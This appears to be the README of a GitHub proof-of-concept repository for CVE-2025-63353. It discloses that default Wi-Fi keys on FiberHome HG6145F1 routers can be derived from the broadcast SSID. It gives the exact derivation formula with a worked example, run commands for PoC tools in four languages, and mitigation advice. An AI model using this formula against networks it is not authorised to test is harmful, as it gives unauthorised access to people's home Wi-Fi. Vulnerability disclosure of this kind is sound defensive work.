Zvckster/CVE-2025-63353

# CVE-2025-63353 PoC - FiberHome HG6145F1 Predictable Default Wi-Fi PSK [](https://nvd.nist.gov/vuln/detail/CVE-2025-63353) [](https://nvd.nist.gov/vuln/detail/CVE-2025-63353) [](https://cwe.mitre.org/data/definitions/284.html) [](https://github.com/Zvckster/CVE-2025-63353/actions/workflows/test.yml) [](LICENSE) ## Summary The factory default Wi-Fi pre-shared key on affected FiberHome HG6145F1 devices is a deterministic function of the broadcast SSID. An attacker observing a beacon frame from a vulnerable device can derive the WPA2 PSK in constant time with no captured handshake, no wordlist, no GPU, and no client interaction. For a device broadcasting SSID `fh_`, the default PSK is: PSK = "wlan" + hex(0xFFFFFF XOR hex_a) **Example:** `fh_a1f9d1` → `wlan5e062e` The effective per-device keyspace is **1**. The population-wide keyspace across all HG6145F1 deployments is at most **2²⁴ ≈ 16.7 million** (SSID, PSK) pairs and since the SSID is broadcast, the SSID-to-PSK mapping is one-to-one. ## Repository contents . ├── README.md ├── LICENSE ├── docs/ │ ├── vulnerability.md Technical analysis of the algorithm │ ├── timeline.md Disclosure chronology and vendor response │ ├── affected-deployments.md Device specifications and known deployments │ ├── related-research.md Lineage of predictable-PSK vulnerabilities │ ├── references.md Curated bibliography │ └── mitigation.md Guidance for users, ISPs, and vendors └── poc/ ├── python/ pure-Python implementation, no dependencies ├── go/ standalone Go binary ├── javascript/ browser-friendly JS / Node.js └── c/ portable single-file ANSI C (compiles anywhere) ## Quick start # Python python3 poc/python/fh-poc.py fh_a1f9d1 # wlan5e062e # Go cd poc/go && go run fh-poc.go fh_a1f9d1 # wlan5e062e # JavaScript (Node) node poc/javascript/fh-poc.js fh_a1f9d1 # wlan5e062e # C cc poc/c/fh-poc.c -o fh-poc && ./fh-poc fh_a1f9d1 # wlan5e062e All four implementations are independently written, dependency-free, and produce identical output. Use whichever matches your environment. ## Affected devices | Field | Value | |---|---| | Vendor | FiberHome (Wuhan FiberHome International Technologies) | | Model | HG6145F1 | | Firmware | RP4423 | | Device type | GPON ONT, Wi-Fi 6 (802.11ax), dual-band 2.4/5 GHz | | Standards | ITU-T G.984 Class B+, IEEE 802.11 a/b/g/n/ac/ax | The vulnerability is currently disclosed for the HG6145F1 RP4423 firmware only. Verification across the broader HG6145 / HG6243 / HG6821 model family is an open research question. See [docs/affected-deployments.md](docs/affected-deployments.md). ## Mitigation **For end users of an HG6145F1:** 1. Change the default Wi-Fi PSK to a randomly generated 16+ character passphrase immediately. 2. Disable WPS. 3. If your ISP controls firmware updates, ask whether a patched firmware is available. See [docs/mitigation.md](docs/mitigation.md) for guidance specific to ISPs and vendors. ## Disclaimer This repository is published **for educational and defensive security research purposes only**. The vulnerability documented here is publicly disclosed under CVE-2025-63353 and has been assigned a critical severity rating by CISA-ADP. Use of the code in this repository against networks you do not own or do not have explicit written authorization to test is **illegal** in most jurisdictions, including under Moroccan Law 07-03 on cybercrime, the EU Computer Misuse frameworks, the US Computer Fraud and Abuse Act, and equivalent legislation elsewhere. The authors accept no responsibility for unauthorized use of this material. ## References A complete bibliography of primary sources, related vulnerabilities, and academic literature is maintained in [docs/references.md](docs/references.md). ## Author **Ayman Wadi** — Security Engineer

标签：客户端加密